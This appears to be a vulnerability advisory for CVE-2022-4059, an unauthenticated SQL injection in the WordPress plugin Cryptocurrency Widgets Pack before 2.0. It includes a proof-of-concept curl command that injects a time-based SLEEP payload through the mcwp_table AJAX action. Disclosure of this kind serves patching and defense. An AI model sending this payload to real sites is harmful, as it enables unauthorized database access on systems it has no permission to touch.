Cryptocurrency Widgets Pack < 2.0 – Unauthenticated SQLi | CVE 2022-4059 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

Proof of Concept

Invoke the following curl command to induce a 5 seconds sleep:

time curl 'https://exampe.com/wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order\[0\]\[column\]=0&columns\[0\]\[name\]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))aaaa)--+-'

Affects Plugins

cryptocurrency-widgets-pack

Fixed in 2.0

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com

Submitter twitter

Verified

Yes

WPVDB ID

d94bb664-261a-4f3f-8cc3-a2db8230895d

Timeline

Publicly Published

2022-12-09 (about 1 years ago)

Added

2022-12-09 (about 1 years ago)

Last Updated

2023-07-07 (about 10 months ago)

Other

Published

Title

Published

2021-05-27

Title

Sendit WP Newsletter <= 2.5.1 - Authenticated (admin+) SQL Injection

Published

2023-06-22

Title

Colibri Page Builder < 1.0.229 - Admin+ SQL Injection

Published

2015-02-09

Title

Users Ultra <= 1.4.35 - SQL Injection

Published

2015-10-09

Title

Limit Attempts < 1.1.1 - SQL Injection

Published

2023-02-22

Title

Paytm Payment Gateway < 2.7.7 - Editor+ SQLi